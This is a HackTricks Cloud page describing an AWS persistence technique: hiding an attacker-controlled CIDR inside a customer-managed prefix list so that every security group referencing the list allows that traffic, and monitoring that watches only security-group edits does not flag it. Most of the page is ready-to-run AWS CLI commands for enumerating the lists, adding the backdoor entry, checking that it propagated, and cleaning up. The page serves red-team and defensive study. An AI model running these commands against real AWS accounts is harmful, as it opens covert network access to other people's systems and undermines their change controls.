HackTricks CloudAWS - Security Group Backdoor via Managed Prefix Lists
Reading time: 4 minutes
tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Summary
Abuse customer-managed Prefix Lists to create a stealthy access path. If a security group (SG) rule references a managed Prefix List, anyone with the ability to modify that list can silently add attacker-controlled CIDRs. Every SG (and potentially Network ACL or VPC endpoint) that references the list immediately allows the new ranges without any visible SG change.
Impact
- Instant expansion of allowed IP ranges for all SGs referencing the prefix list, bypassing change controls that only monitor SG edits.
- Enables persistent ingress/egress backdoors: keep the malicious CIDR hidden in the prefix list while the SG rule appears unchanged.
Requirements
- IAM permissions:
ec2:DescribeManagedPrefixListsec2:GetManagedPrefixListEntriesec2:ModifyManagedPrefixListec2:DescribeSecurityGroups/ec2:DescribeSecurityGroupRules(to identify attached SGs)
- Optional:
ec2:CreateManagedPrefixListif creating a new one for testing. - Environment: At least one SG rule referencing the target customer-managed Prefix List.
Variables
REGION=us-east-1
PREFIX_LIST_ID=<pl-xxxxxxxx>
ENTRY_CIDR=<attacker-cidr/32>
DESCRIPTION="Backdoor – allow attacker"
Attack Steps
- Enumerate candidate prefix lists and consumers
aws ec2 describe-managed-prefix-lists \
--region "$REGION" \
--query 'PrefixLists[?OwnerId==`<victim-account-id>`].[PrefixListId,PrefixListName,State,MaxEntries]' \
--output table
aws ec2 get-managed-prefix-list-entries \
--prefix-list-id "$PREFIX_LIST_ID" \
--region "$REGION" \
--query 'Entries[*].[Cidr,Description]'
Use aws ec2 describe-security-group-rules --filters Name=referenced-prefix-list-id,Values=$PREFIX_LIST_ID to confirm which SG rules rely on the list.
- Add attacker CIDR to the prefix list
aws ec2 modify-managed-prefix-list \
--prefix-list-id "$PREFIX_LIST_ID" \
--add-entries Cidr="$ENTRY_CIDR",Description="$DESCRIPTION" \
--region "$REGION"
- Validate propagation to security groups
aws ec2 describe-security-group-rules \
--region "$REGION" \
--filters Name=referenced-prefix-list-id,Values="$PREFIX_LIST_ID" \
--query 'SecurityGroupRules[*].{SG:GroupId,Description:Description}' \
--output table
Traffic from $ENTRY_CIDR is now allowed wherever the prefix list is referenced (commonly outbound rules on egress proxies or inbound rules on shared services).
Evidence
get-managed-prefix-list-entriesreflects the attacker CIDR and description.describe-security-group-rulesstill shows the original SG rule referencing the prefix list (no SG modification recorded), yet traffic from the new CIDR succeeds.
Cleanup
aws ec2 modify-managed-prefix-list \
--prefix-list-id "$PREFIX_LIST_ID" \
--remove-entries Cidr="$ENTRY_CIDR" \
--region "$REGION"
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.